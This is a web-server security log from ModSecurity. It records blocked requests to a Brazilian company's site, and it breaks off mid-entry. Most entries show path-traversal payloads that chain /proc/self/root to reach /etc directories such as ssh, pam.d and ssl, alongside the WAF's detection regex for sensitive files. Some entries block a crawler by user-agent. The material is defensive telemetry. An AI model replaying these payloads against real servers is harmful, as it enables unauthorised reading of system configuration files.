[Mon Mar 16 19:37:15.370885 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.228.16:49712] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiGG9SswJuvopo3lOiIFgAAAJE"]
[Mon Mar 16 19:37:22.507428 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.241.46:46648] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiGItSswJuvopo3lOiIHwAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:38:18.851697 2026] [:error] [pid 29802:tid 140411582465792] [client 74.7.241.46:59698] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiGWc_BxrYCr4hPDw8TIQAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:38:24.023068 2026] [:error] [pid 14895:tid 140411548894976] [client 74.7.243.203:35788] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiGYFajLEzk2WiQ-106DwAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:38:30.245482 2026] [:error] [pid 29507:tid 140411590858496] [client 74.7.241.46:34320] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiGZkr9dMAiw-8KANNvagAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:38:41.008045 2026] [:error] [pid 14895:tid 140411666392832] [client 74.7.241.46:43254] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiGcVajLEzk2WiQ-106GgAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:38:42.313108 2026] [:error] [pid 29507:tid 140411716749056] [client 74.7.241.46:35250] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiGckr9dMAiw-8KANNvbAAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:38:43.665425 2026] [:error] [pid 15061:tid 140411590858496] [client 74.7.241.46:35260] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiGc6TCbgAP5jq5TehRsQAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:38:57.524090 2026] [:error] [pid 29802:tid 140411616036608] [client 74.7.241.46:35270] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiGgc_BxrYCr4hPDw8TWAAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:39:05.647779 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.241.46:37512] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiGif9ocpUE4ed4uDwadAAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:39:19.272383 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.241.46:37526] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiGl7ysWC90G-1nBrBsnQAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:40:09.780611 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.241.46:58346] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiGyf9ocpUE4ed4uDwa5gAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:40:16.106882 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.244.31:43374] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiG0NSswJuvopo3lOiIjgAAAIg"]
[Mon Mar 16 19:40:26.082366 2026] [:error] [pid 29802:tid 140411548894976] [client 74.7.241.46:35492] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiG2s_BxrYCr4hPDw8TnAAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:40:54.499736 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.241.46:58852] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiG9tSswJuvopo3lOiIzQAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:41:00.143135 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.241.46:41052] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiG_LABkC4fWIHEf8EgkwAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:41:05.583054 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.241.46:39262] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiHAbABkC4fWIHEf8EgnQAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:41:59.294427 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.243.203:46098] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiHN7ysWC90G-1nBrBtDQAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:42:02.626933 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.243.203:44592] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiHOo6lpbStxTqkSkuOnQAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:42:14.980185 2026] [:error] [pid 14895:tid 140411599251200] [client 74.7.243.203:44600] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiHRlajLEzk2WiQ-106YwAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:42:16.137570 2026] [:error] [pid 29802:tid 140411683178240] [client 74.7.228.16:33086] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiHSM_BxrYCr4hPDw8TvwAAAcc"]
[Mon Mar 16 19:42:22.282726 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.241.46:39264] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiHTqTCbgAP5jq5TehSeAAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:43:09.832734 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.241.46:45112] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiHff9ocpUE4ed4uDwbZwAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:43:12.275850 2026] [:error] [pid 29802:tid 140411632822016] [client 74.7.241.46:38000] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag 